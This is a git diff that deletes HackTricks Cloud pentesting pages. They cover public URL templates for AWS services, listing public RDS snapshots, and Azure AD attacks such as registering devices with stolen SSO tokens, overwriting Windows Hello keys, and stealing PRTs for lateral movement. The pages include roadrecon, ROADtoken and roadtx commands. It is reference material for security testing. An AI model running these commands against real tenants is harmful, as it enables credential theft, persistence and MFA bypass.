-{% endhint %} - -### Public URL template - -``` -https://{random_id}.kinesisvideo.{region}.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md deleted file mode 100644 index aac576119..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - Lambda Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Function URL - -It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. - -### Public URL template - -``` -https://{random_id}.lambda-url.{region}.on.aws/ -``` - -### Get Account ID from public Lambda URL - -Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md deleted file mode 100644 index 1d1e83f04..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - Media Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.mediaconvert.{region}.amazonaws.com -https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel -https://{random_id}.data.mediastore.{region}.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md deleted file mode 100644 index 1c748c6d4..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - MQ Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Port - -### **RabbitMQ** - -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` - -### ActiveMQ - -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. - -### Public URL template - -``` -https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ -ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md deleted file mode 100644 index 0de37352c..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - MSK Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public Port - -It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). - -It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. - -### Public URL template - -``` -b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com -{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md deleted file mode 100644 index fa2b1ba73..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - RDS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -## Public Port - -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. - -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: - -```bash -# Public RDS snapshots -aws rds describe-db-snapshots --include-public - -## Search by account ID -aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]' -## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted) -## To share a RDS encrypted snapshot you need to share the KMS key also with the account - - -# From the own account you can check if there is any public snapshot with: -aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] -## Even if in the console appear as there are public snapshot it might be public -## snapshots from other accounts used by the current account -``` - -### Public URL template - -``` -mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 -postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md deleted file mode 100644 index a6e2a448a..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Redshift Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -{user_provided}...redshift.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md deleted file mode 100644 index 416a48e0e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - SNS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information about SNS check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### Open to All - -When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: - -
- -So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md deleted file mode 100644 index 5926225b3..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - SQS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information about SQS check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### Public URL template - -``` -https://sqs.[region].amazonaws.com/[account-id]/{user_provided} -``` - -### Check Permissions - -It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-device-registration.md b/pentesting-cloud/azure-security/az-device-registration.md deleted file mode 100644 index 44e42482b..000000000 --- a/pentesting-cloud/azure-security/az-device-registration.md +++ /dev/null @@ -1,138 +0,0 @@ -# Az - Device Registration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -When a device joins AzureAD a new object is created in AzureAD. - -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. - -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: - -```bash -dsregcmd /status -``` - -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### TPM - Trusted Platform Module - -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. - -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): - -{% content-ref url="az-lateral-movement-cloud-on-prem/pass-the-prt.md" %} -[pass-the-prt.md](az-lateral-movement-cloud-on-prem/pass-the-prt.md) -{% endcontent-ref %} - -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: - -```bash -# Initialize SSO flow -roadrecon auth prt-init -.\ROADtoken.exe - -# Request token with PRT with PRT cookie -roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie - -# Custom pyhton script to register a device (check roadtx) -registerdevice.py -``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. - -{% hint style="success" %} -Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. -{% endhint %} - -{% hint style="danger" %} -This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). -{% endhint %} - -## Overwriting a device ticket - -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). - -
- -{% hint style="danger" %} -However, this was fixed. -{% endhint %} - -## Overwrite WHFB key - -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) - -Attack summary: - -* It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -* It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -* This also provides **persistence** - -
- -Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph. - -Then, it's possible to generate a new key with: - -```bash -roadtx genhellokey -d -k tempkey.key -``` - -and then PATCH the information of the searchableDeviceKey: - -
- -It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: - -{% content-ref url="az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md" %} -[az-phishing-primary-refresh-token-microsoft-entra.md](az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) -{% endcontent-ref %} - -
- -## References - -* [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) -* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) -* [https://www.youtube.com/watch?v=AFay\_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md deleted file mode 100644 index 5cb58cb86..000000000 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ /dev/null @@ -1,91 +0,0 @@ -# Az - Lateral Movement (Cloud - On-Prem) - -## Az - Lateral Movement (Cloud - On-Prem) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### On-Prem machines connected to cloud - -There are different ways a machine can be connected to the cloud: - -#### Azure AD joined - -
- -#### Workplace joined - -

https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large

- -#### Hybrid joined - -

https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large

- -#### Workplace joined on AADJ or Hybrid - -

https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

- -### Tokens and limitations - -In Azure AD, there are different types of tokens with specific limitations: - -* **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource. -* **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications. -* **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device. -* **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens. - -The most interesting type of token is the Primary Refresh Token (PRT). - -{% content-ref url="az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) -{% endcontent-ref %} - -### Pivoting Techniques - -From the **compromised machine to the cloud**: - -* [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login -* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text. -* [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it -* [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it. -* [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another - -From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**: - -* [**Azure AD Connect**](azure-ad-connect-hybrid-identity/) -* **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md) - -#### [Roadtx](https://github.com/dirkjanm/ROADtools) - -This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or 